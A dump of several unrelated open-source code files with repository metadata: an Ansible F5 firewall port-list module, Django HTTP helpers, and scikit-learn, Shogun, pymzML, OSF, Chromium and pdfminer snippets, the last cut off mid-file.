and remove port list entries.
version_added: 2.5
options:
name:
description:
- Specifies the name of the port list.
required: True
partition:
description:
- Device partition to manage resources on.
default: Common
description:
description:
- Description of the port list
ports:
description:
- Simple list of port values to add to the list
port_ranges:
description:
- A list of port ranges where the range starts with a port number, is followed
by a dash (-) and then a second number.
- If the first number is greater than the second number, the numbers will be
reversed so-as to be properly formatted. ie, 90-78 would become 78-90.
port_lists:
description:
- Simple list of existing port lists to add to this list. Port lists can be
specified in either their fully qualified name (/Common/foo) or their short
name (foo). If a short name is used, the C(partition) argument will automatically
be prepended to the short name.
state:
description:
- When C(present), ensures that the address list and entries exists.
- When C(absent), ensures the address list is removed.
default: present
choices:
- present
- absent
extends_documentation_fragment: f5
author:
- Tim Rupp (@caphrim007)
- Wojciech Wypior (@wojtek0806)
'''
EXAMPLES = r'''
- name: Create a simple port list
bigip_firewall_port_list:
name: foo
ports:
- 80
- 443
state: present
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Override the above list of ports with a new list
bigip_firewall_port_list:
name: foo
ports:
- 3389
- 8080
- 25
state: present
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Create port list with series of ranges
bigip_firewall_port_list:
name: foo
port_ranges:
- 25-30
- 80-500
- 50-78
state: present
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Use multiple types of port arguments
bigip_firewall_port_list:
name: foo
port_ranges:
- 25-30
- 80-500
- 50-78
ports:
- 8080
- 443
state: present
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Remove port list
bigip_firewall_port_list:
name: foo
state: absent
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Create port list from a file with one port per line
bigip_firewall_port_list:
name: lot-of-ports
ports: "{{ lookup('file', 'my-large-port-list.txt').split('\n') }}"
state: present
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
'''
RETURN = r'''
description:
description: The new description of the port list.
returned: changed
type: str
sample: My port list
ports:
description: The new list of ports applied to the port list.
returned: changed
type: list
sample: [80, 443]
port_ranges:
description: The new list of port ranges applied to the port list.
returned: changed
type: list
sample: [80-100, 200-8080]
port_lists:
description: The new list of port list names applied to the port list.
returned: changed
type: list
sample: [/Common/list1, /Common/list2]
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.basic import env_fallback
try:
from library.module_utils.network.f5.bigip import F5RestClient
from library.module_utils.network.f5.common import F5ModuleError
from library.module_utils.network.f5.common import AnsibleF5Parameters
from library.module_utils.network.f5.common import cleanup_tokens
from library.module_utils.network.f5.common import fq_name
from library.module_utils.network.f5.common import f5_argument_spec
from library.module_utils.network.f5.common import transform_name
from library.module_utils.network.f5.common import exit_json
from library.module_utils.network.f5.common import fail_json
from library.module_utils.network.f5.icontrol import module_provisioned
except ImportError:
from ansible.module_utils.network.f5.bigip import F5RestClient
from ansible.module_utils.network.f5.common import F5ModuleError
from ansible.module_utils.network.f5.common import AnsibleF5Parameters
from ansible.module_utils.network.f5.common import cleanup_tokens
from ansible.module_utils.network.f5.common import fq_name
from ansible.module_utils.network.f5.common import f5_argument_spec
from ansible.module_utils.network.f5.common import transform_name
from ansible.module_utils.network.f5.common import exit_json
from ansible.module_utils.network.f5.common import fail_json
from ansible.module_utils.network.f5.icontrol import module_provisioned
class Parameters(AnsibleF5Parameters):
api_map = {
'portLists': 'port_lists',
}
api_attributes = [
'portLists', 'ports', 'description',
]
returnables = [
'ports', 'port_ranges', 'port_lists', 'description',
]
updatables = [
'description', 'ports', 'port_ranges', 'port_lists',
]
class ApiParameters(Parameters):
@property
def port_ranges(self):
if self._values['ports'] is None:
return None
result = []
for port_range in self._values['ports']:
if '-' not in port_range['name']:
continue
start, stop = port_range['name'].split('-')
start = int(start.strip())
stop = int(stop.strip())
if start > stop:
stop, start = start, stop
item = '{0}-{1}'.format(start, stop)
result.append(item)
return result
@property
def port_lists(self):
if self._values['port_lists'] is None:
return None
result = []
for x in self._values['port_lists']:
item = '/{0}/{1}'.format(x['partition'], x['name'])
result.append(item)
return result
@property
def ports(self):
if self._values['ports'] is None:
return None
result = [int(x['name']) for x in self._values['ports'] if '-' not in x['name']]
return result
class ModuleParameters(Parameters):
@property
def ports(self):
if self._values['ports'] is None:
return None
if any(x for x in self._values['ports'] if '-' in str(x)):
raise F5ModuleError(
"Ports must be whole numbers between 0 and 65,535"
)
if any(x for x in self._values['ports'] if 0 < int(x) > 65535):
raise F5ModuleError(
"Ports must be whole numbers between 0 and 65,535"
)
result = [int(x) for x in self._values['ports']]
return result
@property
def port_ranges(self):
if self._values['port_ranges'] is None:
return None
result = []
for port_range in self._values['port_ranges']:
if '-' not in port_range:
continue
start, stop = port_range.split('-')
start = int(start.strip())
stop = int(stop.strip())
if start > stop:
stop, start = start, stop
if 0 < start > 65535 or 0 < stop > 65535:
raise F5ModuleError(
"Ports must be whole numbers between 0 and 65,535"
)
item = '{0}-{1}'.format(start, stop)
result.append(item)
return result
@property
def port_lists(self):
if self._values['port_lists'] is None:
return None
result = []
for x in self._values['port_lists']:
item = fq_name(self.partition, x)
result.append(item)
return result
class Changes(Parameters):
def to_return(self):
result = {}
try:
for returnable in self.returnables:
result[returnable] = getattr(self, returnable)
result = self._filter_params(result)
except Exception:
pass
return result
class ReportableChanges(Changes):
@property
def ports(self):
result = []
for item in self._values['ports']:
if '-' in item['name']:
continue
result.append(item['name'])
return result
@property
def port_ranges(self):
result = []
for item in self._values['ports']:
if '-' not in item['name']:
continue
result.append(item['name'])
return result
class UsableChanges(Changes):
@property
def ports(self):
if self._values['ports'] is None and self._values['port_ranges'] is None:
return None
result = []
if self._values['ports']:
# The values of the 'key' index literally need to be string values.
# If they are not, on BIG-IP 12.1.0 they will raise this REST exception.
#
# {
# "code": 400,
# "message": "one or more configuration identifiers must be provided",
# "errorStack": [],
# "apiError": 26214401
# }
result += [dict(name=str(x)) for x in self._values['ports']]
if self._values['port_ranges']:
result += [dict(name=str(x)) for x in self._values['port_ranges']]
return result
@property
def port_lists(self):
if self._values['port_lists'] is None:
return None
result = []
for x in self._values['port_lists']:
partition, name = x.split('/')[1:]
result.append(dict(
name=name,
partition=partition
))
return result
class Difference(object):
def __init__(self, want, have=None):
self.want = want
self.have = have
def compare(self, param):
try:
result = getattr(self, param)
return result
except AttributeError:
return self.__default(param)
def __default(self, param):
attr1 = getattr(self.want, param)
try:
attr2 = getattr(self.have, param)
if attr1 != attr2:
return attr1
except AttributeError:
return attr1
@property
def ports(self):
if self.want.ports is None:
return None
elif self.have.ports is None:
return self.want.ports
if sorted(self.want.ports) != sorted(self.have.ports):
return self.want.ports
@property
def port_lists(self):
if self.want.port_lists is None:
return None
elif self.have.port_lists is None:
return self.want.port_lists
if sorted(self.want.port_lists) != sorted(self.have.port_lists):
return self.want.port_lists
@property
def port_ranges(self):
if self.want.port_ranges is None:
return None
elif self.have.port_ranges is None:
return self.want.port_ranges
if sorted(self.want.port_ranges) != sorted(self.have.port_ranges):
return self.want.port_ranges
class ModuleManager(object):
def __init__(self, *args, **kwargs):
self.module = kwargs.get('module', None)
self.client = kwargs.get('client', None)
self.want = ModuleParameters(params=self.module.params)
self.have = ApiParameters()
self.changes = UsableChanges()
def _set_changed_options(self):
changed = {}
for key in Parameters.returnables:
if getattr(self.want, key) is not None:
changed[key] = getattr(self.want, key)
if changed:
self.changes = UsableChanges(params=changed)
def _update_changed_options(self):
diff = Difference(self.want, self.have)
updatables = Parameters.updatables
changed = dict()
for k in updatables:
change = diff.compare(k)
if change is None:
continue
else:
if isinstance(change, dict):
changed.update(change)
else:
changed[k] = change
if changed:
self.changes = UsableChanges(params=changed)
return True
return False
def should_update(self):
result = self._update_changed_options()
if result:
return True
return False
def exec_module(self):
if not module_provisioned(self.client, 'afm'):
raise F5ModuleError(
"AFM must be provisioned to use this module."
)
changed = False
result = dict()
state = self.want.state
if state == "present":
changed = self.present()
elif state == "absent":
changed = self.absent()
reportable = ReportableChanges(params=self.changes.to_return())
changes = reportable.to_return()
result.update(**changes)
result.update(dict(changed=changed))
self._announce_deprecations(result)
return result
def _announce_deprecations(self, result):
warnings = result.pop('__warnings', [])
for warning in warnings:
self.module.deprecate(
msg=warning['msg'],
version=warning['version']
)
def present(self):
if self.exists():
return self.update()
else:
return self.create()
def absent(self):
if self.exists():
return self.remove()
return False
def update(self):
self.have = self.read_current_from_device()
if not self.should_update():
return False
if self.module.check_mode:
return True
self.update_on_device()
return True
def remove(self):
if self.module.check_mode:
return True
self.remove_from_device()
if self.exists():
raise F5ModuleError("Failed to delete the resource.")
return True
def create(self):
self._set_changed_options()
if self.module.check_mode:
return True
self.create_on_device()
return True
def exists(self):
uri = "https://{0}:{1}/mgmt/tm/security/firewall/port-list/{2}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.name)
)
resp = self.client.api.get(uri)
try:
response = resp.json()
except ValueError:
return False
if resp.status == 404 or 'code' in response and response['code'] == 404:
return False
return True
def update_on_device(self):
params = self.changes.api_params()
uri = "https://{0}:{1}/mgmt/tm/security/firewall/port-list/{2}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.name)
)
resp = self.client.api.patch(uri, json=params)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] == 400:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
def read_current_from_device(self):
uri = "https://{0}:{1}/mgmt/tm/security/firewall/port-list/{2}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.name)
)
resp = self.client.api.get(uri)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] == 400:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
return ApiParameters(params=response)
def create_on_device(self):
params = self.changes.api_params()
params['name'] = self.want.name
params['partition'] = self.want.partition
uri = "https://{0}:{1}/mgmt/tm/security/firewall/port-list/".format(
self.client.provider['server'],
self.client.provider['server_port'],
)
resp = self.client.api.post(uri, json=params)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] in [400, 403]:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
return response['selfLink']
def remove_from_device(self):
uri = "https://{0}:{1}/mgmt/tm/security/firewall/port-list/{2}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.name)
)
response = self.client.api.delete(uri)
if response.status == 200:
return True
raise F5ModuleError(response.content)
class ArgumentSpec(object):
def __init__(self):
self.supports_check_mode = True
argument_spec = dict(
name=dict(required=True),
description=dict(),
ports=dict(type='list'),
port_ranges=dict(type='list'),
port_lists=dict(type='list'),
partition=dict(
default='Common',
fallback=(env_fallback, ['F5_PARTITION'])
),
state=dict(
default='present',
choices=['present', 'absent']
)
)
self.argument_spec = {}
self.argument_spec.update(f5_argument_spec)
self.argument_spec.update(argument_spec)
def main():
spec = ArgumentSpec()
module = AnsibleModule(
argument_spec=spec.argument_spec,
supports_check_mode=spec.supports_check_mode
)
client = F5RestClient(**module.params)
try:
mm = ModuleManager(module=module, client=client)
results = mm.exec_module()
cleanup_tokens(client)
exit_json(module, results, client)
except F5ModuleError as ex:
cleanup_tokens(client)
fail_json(module, ex, client)
if __name__ == '__main__':
main()
| gpl-3.0 |
StSchulze/pymzML | pymzml/utils/read_moby_dick.py | 2 | 2003 | #!/usr/bin/env python3
"""
Show chapter x of indexed gzipped moby dick
Usage:
python read_moby_dick.py <Chapter>
"""
# Python mzML module - pymzml
# Copyright (C) 2010-2019 M. Kösters, C. Fufezan
# The MIT License (MIT)
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from GSGR import GSGR
import sys
import time
my_Reader = GSGR("./Moby_Dick_indexed.gz")
if __name__ == "__main__":
if len(sys.argv) != 2:
print(__doc__)
else:
try:
chap_num = int(sys.argv[1])
except:
chap_num = sys.argv[1]
print(
"""
Reading indexed gzip and retrieving chapter {0}
""".format(
chap_num
)
)
s = time.time()
print(
"""{0}
Took {1:.5f} seconds to retrieve chapter
""".format(
my_Reader.read_block(chap_num), time.time() - s
)
)
| mit |
petermalcolm/osf.io | scripts/impute_names.py | 64 | 2374 | """
Email users to verify citation information.
"""
import re
import logging
from framework.auth.utils import impute_names
from framework.email.tasks import send_email
from website.app import init_app
from website import models
app = init_app('website.settings', set_backends=True, routes=True)
logging.basicConfig(filename='impute_names.log', level=logging.DEBUG)
email_template = u'''Hello, {fullname},
Along with a shorter domain name (http://osf.io), the Open Science Framework
has recently introduced a citation widget on project and component dashboards.
As such, we are expanding user settings to include Citation Style Language name
specifications that will allow us to accurately produce these citations. Your full
name can be different than the parts of the name used in citations.
Based upon your full name, "{fullname}", we've done our best to automatically infer the following:
Given name: {given_name}
Middle name(s): {middle_names}
Family name: {family_name}
Suffix: {suffix}
If this information is correct, you don't need to do anything. If you'd like
to make an adjustment or test the parsing algorithm, please browse to
http://osf.io/settings
If you have any questions or comments, please contact us at feedback+citations@osf.io (don't reply to this email).
I remain,
Sincerely yours,
The OSF Robot.
'''
def clean_template(template):
cleaned = ''
for line in template.splitlines():
cleaned += line or '\n'
cleaned = re.sub(' +', ' ', cleaned)
return cleaned
email_template = clean_template(email_template)
def email_name(user):
logging.debug('Emailing user {0}'.format(user.fullname))
names = {'fullname': user.fullname}
names.update(impute_names(user.fullname))
message=email_template.format(**names).encode('utf-8')
success = send_email(
from_addr='openscienceframework-robot@osf.io',
to_addr=user.username,
subject='Open Science Framework: Verify your citation information',
message=message,
mimetype='plain',
)
if success:
logging.debug('Emailing user {0}: Success'.format(user.fullname))
else:
logging.debug('Emailing user {0}: Failure'.format(user.fullname))
def email_names():
for user in models.User.find():
email_name(user)
#if __name__ == '__main__':
# impute_names('names.tsv')
| apache-2.0 |
s20121035/rk3288_android5.1_repo | external/chromium_org/tools/cr/cr/actions/builder.py | 71 | 2484 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""A module for the Builder base class."""
import difflib
import cr
class Builder(cr.Action, cr.Plugin.Type):
"""Base class for implementing builders.
Builder implementations must override the Build and Clean methods at a
minimum to build a target and clean up back to a pristine state respectively.
They can also override Rebuild if they are able to handle it in a more
efficient way that a Clean Build sequence.
They should override the GetTargets method to return the set of valid targets
the build system knows about, and override IsTarget if they can implement it
more efficiently than checking from presents in the result of GetTargets.
"""
SELECTOR_ARG = '--builder'
SELECTOR = 'CR_BUILDER'
SELECTOR_HELP = 'Sets the builder to use to update dependencies.'
@cr.Plugin.activemethod
def Build(self, targets, arguments):
raise NotImplementedError('Must be overridden.')
@cr.Plugin.activemethod
def Clean(self, targets, arguments):
"""Clean temporary files built by a target."""
raise NotImplementedError('Must be overridden.')
@cr.Plugin.activemethod
def Rebuild(self, targets, arguments):
"""Make a target build even if it is up to date.
Default implementation is to do a Clean and Build sequence.
Do not call the base version if you implement a more efficient one.
"""
self.Clean(targets, [])
self.Build(targets, arguments)
@cr.Plugin.activemethod
def GetTargets(self):
"""Gets the full set of targets supported by this builder.
Used in automatic target name transformations, and also in offering the
user choices.
"""
return []
@cr.Plugin.activemethod
def IsTarget(self, target_name):
"""Check if a target name is on the builder knows about."""
return target_name in self.GetTargets()
@cr.Plugin.activemethod
def GuessTargets(self, target_name):
"""Returns a list of closest matching targets for a named target."""
return difflib.get_close_matches(target_name, self.GetTargets(), 10, 0.4)
class SkipBuilder(Builder):
"""The "skip" version of a Builder, causes the build step to be skipped."""
@property
def priority(self):
return super(SkipBuilder, self).priority - 1
def Build(self, targets, arguments):
pass
def Clean(self, targets, arguments):
pass
| gpl-3.0 |
mdanielwork/intellij-community | python/lib/Lib/site-packages/django/utils/http.py | 69 | 4132 | import re
import urllib
from email.Utils import formatdate
from django.utils.encoding import smart_str, force_unicode
from django.utils.functional import allow_lazy
ETAG_MATCH = re.compile(r'(?:W/)?"((?:\\.|[^"])*)"')
def urlquote(url, safe='/'):
"""
A version of Python's urllib.quote() function that can operate on unicode
strings. The url is first UTF-8 encoded before quoting. The returned string
can safely be used as part of an argument to a subsequent iri_to_uri() call
without double-quoting occurring.
"""
return force_unicode(urllib.quote(smart_str(url), smart_str(safe)))
urlquote = allow_lazy(urlquote, unicode)
def urlquote_plus(url, safe=''):
"""
A version of Python's urllib.quote_plus() function that can operate on
unicode strings. The url is first UTF-8 encoded before quoting. The
returned string can safely be used as part of an argument to a subsequent
iri_to_uri() call without double-quoting occurring.
"""
return force_unicode(urllib.quote_plus(smart_str(url), smart_str(safe)))
urlquote_plus = allow_lazy(urlquote_plus, unicode)
def urlencode(query, doseq=0):
"""
A version of Python's urllib.urlencode() function that can operate on
unicode strings. The parameters are first case to UTF-8 encoded strings and
then encoded as per normal.
"""
if hasattr(query, 'items'):
query = query.items()
return urllib.urlencode(
[(smart_str(k),
isinstance(v, (list,tuple)) and [smart_str(i) for i in v] or smart_str(v))
for k, v in query],
doseq)
def cookie_date(epoch_seconds=None):
"""
Formats the time to ensure compatibility with Netscape's cookie standard.
Accepts a floating point number expressed in seconds since the epoch, in
UTC - such as that outputted by time.time(). If set to None, defaults to
the current time.
Outputs a string in the format 'Wdy, DD-Mon-YYYY HH:MM:SS GMT'.
"""
rfcdate = formatdate(epoch_seconds)
return '%s-%s-%s GMT' % (rfcdate[:7], rfcdate[8:11], rfcdate[12:25])
def http_date(epoch_seconds=None):
"""
Formats the time to match the RFC1123 date format as specified by HTTP
RFC2616 section 3.3.1.
Accepts a floating point number expressed in seconds since the epoch, in
UTC - such as that outputted by time.time(). If set to None, defaults to
the current time.
Outputs a string in the format 'Wdy, DD Mon YYYY HH:MM:SS GMT'.
"""
rfcdate = formatdate(epoch_seconds)
return '%s GMT' % rfcdate[:25]
# Base 36 functions: useful for generating compact URLs
def base36_to_int(s):
"""
Converts a base 36 string to an ``int``. To prevent
overconsumption of server resources, raises ``ValueError` if the
input is longer than 13 base36 digits (13 digits is sufficient to
base36-encode any 64-bit integer).
"""
if len(s) > 13:
raise ValueError("Base36 input too large")
return int(s, 36)
def int_to_base36(i):
"""
Converts an integer to a base36 string
"""
digits = "0123456789abcdefghijklmnopqrstuvwxyz"
factor = 0
# Find starting factor
while True:
factor += 1
if i < 36 ** factor:
factor -= 1
break
base36 = []
# Construct base36 representation
while factor >= 0:
j = 36 ** factor
base36.append(digits[i / j])
i = i % j
factor -= 1
return ''.join(base36)
def parse_etags(etag_str):
"""
Parses a string with one or several etags passed in If-None-Match and
If-Match headers by the rules in RFC 2616. Returns a list of etags
without surrounding double quotes (") and unescaped from \<CHAR>.
"""
etags = ETAG_MATCH.findall(etag_str)
if not etags:
# etag_str has wrong format, treat it as an opaque string then
return [etag_str]
etags = [e.decode('string_escape') for e in etags]
return etags
def quote_etag(etag):
"""
Wraps a string in double quotes escaping contents as necesary.
"""
return '"%s"' % etag.replace('\\', '\\\\').replace('"', '\\"')
| apache-2.0 |
OXPHOS/shogun | examples/undocumented/python/kernel_poly_match_word_string.py | 10 | 1151 | #!/usr/bin/env python
from tools.load import LoadMatrix
lm=LoadMatrix()
traindat = lm.load_dna('../data/fm_train_dna.dat')
testdat = lm.load_dna('../data/fm_test_dna.dat')
parameter_list = [[traindat,testdat,2,True,3,0,False],[traindat,testdat,2,True,3,0,False]]
def kernel_poly_match_word_string (fm_train_dna=traindat,fm_test_dna=testdat,
degree=2,inhomogene=True,order=3,gap=0,reverse=False):
from shogun import PolyMatchWordStringKernel
from shogun import StringWordFeatures, StringCharFeatures, DNA
charfeat=StringCharFeatures(fm_train_dna, DNA)
feats_train=StringWordFeatures(DNA)
feats_train.obtain_from_char(charfeat, order-1, order, gap, reverse)
charfeat=StringCharFeatures(fm_test_dna, DNA)
feats_test=StringWordFeatures(DNA)
feats_test.obtain_from_char(charfeat, order-1, order, gap, reverse)
kernel=PolyMatchWordStringKernel(feats_train, feats_train, degree, inhomogene)
km_train=kernel.get_kernel_matrix()
kernel.init(feats_train, feats_test)
km_test=kernel.get_kernel_matrix()
return km_train,km_test,kernel
if __name__=='__main__':
print('PolyMatchWordString')
kernel_poly_match_word_string(*parameter_list[0])
| gpl-3.0 |
h2educ/scikit-learn | examples/bicluster/bicluster_newsgroups.py | 142 | 7183 | """
================================================================
Biclustering documents with the Spectral Co-clustering algorithm
================================================================
This example demonstrates the Spectral Co-clustering algorithm on the
twenty newsgroups dataset. The 'comp.os.ms-windows.misc' category is
excluded because it contains many posts containing nothing but data.
The TF-IDF vectorized posts form a word frequency matrix, which is
then biclustered using Dhillon's Spectral Co-Clustering algorithm. The
resulting document-word biclusters indicate subsets words used more
often in those subsets documents.
For a few of the best biclusters, its most common document categories
and its ten most important words get printed. The best biclusters are
determined by their normalized cut. The best words are determined by
comparing their sums inside and outside the bicluster.
For comparison, the documents are also clustered using
MiniBatchKMeans. The document clusters derived from the biclusters
achieve a better V-measure than clusters found by MiniBatchKMeans.
Output::
Vectorizing...
Coclustering...
Done in 9.53s. V-measure: 0.4455
MiniBatchKMeans...
Done in 12.00s. V-measure: 0.3309
Best biclusters:
----------------
bicluster 0 : 1951 documents, 4373 words
categories : 23% talk.politics.guns, 19% talk.politics.misc, 14% sci.med
words : gun, guns, geb, banks, firearms, drugs, gordon, clinton, cdt, amendment
bicluster 1 : 1165 documents, 3304 words
categories : 29% talk.politics.mideast, 26% soc.religion.christian, 25% alt.atheism
words : god, jesus, christians, atheists, kent, sin, morality, belief, resurrection, marriage
bicluster 2 : 2219 documents, 2830 words
categories : 18% comp.sys.mac.hardware, 16% comp.sys.ibm.pc.hardware, 16% comp.graphics
words : voltage, dsp, board, receiver, circuit, shipping, packages, stereo, compression, package
bicluster 3 : 1860 documents, 2745 words
categories : 26% rec.motorcycles, 23% rec.autos, 13% misc.forsale
words : bike, car, dod, engine, motorcycle, ride, honda, cars, bmw, bikes
bicluster 4 : 12 documents, 155 words
categories : 100% rec.sport.hockey
words : scorer, unassisted, reichel, semak, sweeney, kovalenko, ricci, audette, momesso, nedved
"""
from __future__ import print_function
print(__doc__)
from collections import defaultdict
import operator
import re
from time import time
import numpy as np
from sklearn.cluster.bicluster import SpectralCoclustering
from sklearn.cluster import MiniBatchKMeans
from sklearn.externals.six import iteritems
from sklearn.datasets.twenty_newsgroups import fetch_20newsgroups
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.cluster import v_measure_score
def number_aware_tokenizer(doc):
""" Tokenizer that maps all numeric tokens to a placeholder.
For many applications, tokens that begin with a number are not directly
useful, but the fact that such a token exists can be relevant. By applying
this form of dimensionality reduction, some methods may perform better.
"""
token_pattern = re.compile(u'(?u)\\b\\w\\w+\\b')
tokens = token_pattern.findall(doc)
tokens = ["#NUMBER" if token[0] in "0123456789_" else token
for token in tokens]
return tokens
# exclude 'comp.os.ms-windows.misc'
categories = ['alt.atheism', 'comp.graphics',
'comp.sys.ibm.pc.hardware', 'comp.sys.mac.hardware',
'comp.windows.x', 'misc.forsale', 'rec.autos',
'rec.motorcycles', 'rec.sport.baseball',
'rec.sport.hockey', 'sci.crypt', 'sci.electronics',
'sci.med', 'sci.space', 'soc.religion.christian',
'talk.politics.guns', 'talk.politics.mideast',
'talk.politics.misc', 'talk.religion.misc']
newsgroups = fetch_20newsgroups(categories=categories)
y_true = newsgroups.target
vectorizer = TfidfVectorizer(stop_words='english', min_df=5,
tokenizer=number_aware_tokenizer)
cocluster = SpectralCoclustering(n_clusters=len(categories),
svd_method='arpack', random_state=0)
kmeans = MiniBatchKMeans(n_clusters=len(categories), batch_size=20000,
random_state=0)
print("Vectorizing...")
X = vectorizer.fit_transform(newsgroups.data)
print("Coclustering...")
start_time = time()
cocluster.fit(X)
y_cocluster = cocluster.row_labels_
print("Done in {:.2f}s. V-measure: {:.4f}".format(
time() - start_time,
v_measure_score(y_cocluster, y_true)))
print("MiniBatchKMeans...")
start_time = time()
y_kmeans = kmeans.fit_predict(X)
print("Done in {:.2f}s. V-measure: {:.4f}".format(
time() - start_time,
v_measure_score(y_kmeans, y_true)))
feature_names = vectorizer.get_feature_names()
document_names = list(newsgroups.target_names[i] for i in newsgroups.target)
def bicluster_ncut(i):
rows, cols = cocluster.get_indices(i)
if not (np.any(rows) and np.any(cols)):
import sys
return sys.float_info.max
row_complement = np.nonzero(np.logical_not(cocluster.rows_[i]))[0]
col_complement = np.nonzero(np.logical_not(cocluster.columns_[i]))[0]
# Note: the following is identical to X[rows[:, np.newaxis], cols].sum() but
# much faster in scipy <= 0.16
weight = X[rows][:, cols].sum()
cut = (X[row_complement][:, cols].sum() +
X[rows][:, col_complement].sum())
return cut / weight
def most_common(d):
"""Items of a defaultdict(int) with the highest values.
Like Counter.most_common in Python >=2.7.
"""
return sorted(iteritems(d), key=operator.itemgetter(1), reverse=True)
bicluster_ncuts = list(bicluster_ncut(i)
for i in range(len(newsgroups.target_names)))
best_idx = np.argsort(bicluster_ncuts)[:5]
print()
print("Best biclusters:")
print("----------------")
for idx, cluster in enumerate(best_idx):
n_rows, n_cols = cocluster.get_shape(cluster)
cluster_docs, cluster_words = cocluster.get_indices(cluster)
if not len(cluster_docs) or not len(cluster_words):
continue
# categories
counter = defaultdict(int)
for i in cluster_docs:
counter[document_names[i]] += 1
cat_string = ", ".join("{:.0f}% {}".format(float(c) / n_rows * 100, name)
for name, c in most_common(counter)[:3])
# words
out_of_cluster_docs = cocluster.row_labels_ != cluster
out_of_cluster_docs = np.where(out_of_cluster_docs)[0]
word_col = X[:, cluster_words]
word_scores = np.array(word_col[cluster_docs, :].sum(axis=0) -
word_col[out_of_cluster_docs, :].sum(axis=0))
word_scores = word_scores.ravel()
important_words = list(feature_names[cluster_words[i]]
for i in word_scores.argsort()[:-11:-1])
print("bicluster {} : {} documents, {} words".format(
idx, n_rows, n_cols))
print("categories : {}".format(cat_string))
print("words : {}\n".format(', '.join(important_words)))
| bsd-3-clause |
Sri0405/pattern | pattern/web/pdf/pdfparser.py | 53 | 27593 | #!/usr/bin/env python2
import sys
import re
import struct
try:
import hashlib as md5
except ImportError:
import md5
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
from psparser import PSStackParser
from psparser import PSSyntaxError, PSEOF
from psparser import literal_name
from psparser import LIT, KWD, STRICT
from pdftypes import PDFException, PDFTypeError, PDFNotImplementedError
from pdftypes import PDFStream, PDFObjRef
from pdftypes import resolve1, decipher_all
from pdftypes import int_value, float_value, num_value
from pdftypes import str_value, list_value, dict_value, stream_value
from arcfour import Arcfour
from utils import choplist, nunpack
from utils import decode_text, ObjIdRange
## Exceptions
##
class PDFSyntaxError(PDFException): pass
class PDFNoValidXRef(PDFSyntaxError): pass
class PDFNoOutlines(PDFException): pass
class PDFDestinationNotFound(PDFException): pass
class PDFEncryptionError(PDFException): pass
class PDFPasswordIncorrect(PDFEncryptionError): pass
# some predefined literals and keywords.
LITERAL_OBJSTM = LIT('ObjStm')
LITERAL_XREF = LIT('XRef')
LITERAL_PAGE = LIT('Page')
LITERAL_PAGES = LIT('Pages')
LITERAL_CATALOG = LIT('Catalog')
## XRefs
##
class PDFBaseXRef(object):
def get_trailer(self):
raise NotImplementedError
def get_objids(self):
return []
def get_pos(self, objid):
raise KeyError(objid)
## PDFXRef
##
class PDFXRef(PDFBaseXRef):
def __init__(self):
self.offsets = {}
self.trailer = {}
return
def load(self, parser, debug=0):
while 1:
try:
(pos, line) = parser.nextline()
if not line.strip(): continue
except PSEOF:
raise PDFNoValidXRef('Unexpected EOF - file corrupted?')
if not line:
raise PDFNoValidXRef('Premature eof: %r' % parser)
if line.startswith('trailer'):
parser.seek(pos)
break
f = line.strip().split(' ')
if len(f) != 2:
raise PDFNoValidXRef('Trailer not found: %r: line=%r' % (parser, line))
try:
(start, nobjs) = map(long, f)
except ValueError:
raise PDFNoValidXRef('Invalid line: %r: line=%r' % (parser, line))
for objid in xrange(start, start+nobjs):
try:
(_, line) = parser.nextline()
except PSEOF:
raise PDFNoValidXRef('Unexpected EOF - file corrupted?')
f = line.strip().split(' ')
if len(f) != 3:
raise PDFNoValidXRef('Invalid XRef format: %r, line=%r' % (parser, line))
(pos, genno, use) = f
if use != 'n': continue
self.offsets[objid] = (int(genno), long(pos))
if 1 <= debug:
print >>sys.stderr, 'xref objects:', self.offsets
self.load_trailer(parser)
return
KEYWORD_TRAILER = KWD('trailer')
def load_trailer(self, parser):
try:
(_,kwd) = parser.nexttoken()
assert kwd is self.KEYWORD_TRAILER
(_,dic) = parser.nextobject()
except PSEOF:
x = parser.pop(1)
if not x:
raise PDFNoValidXRef('Unexpected EOF - file corrupted')
(_,dic) = x[0]
self.trailer.update(dict_value(dic))
return
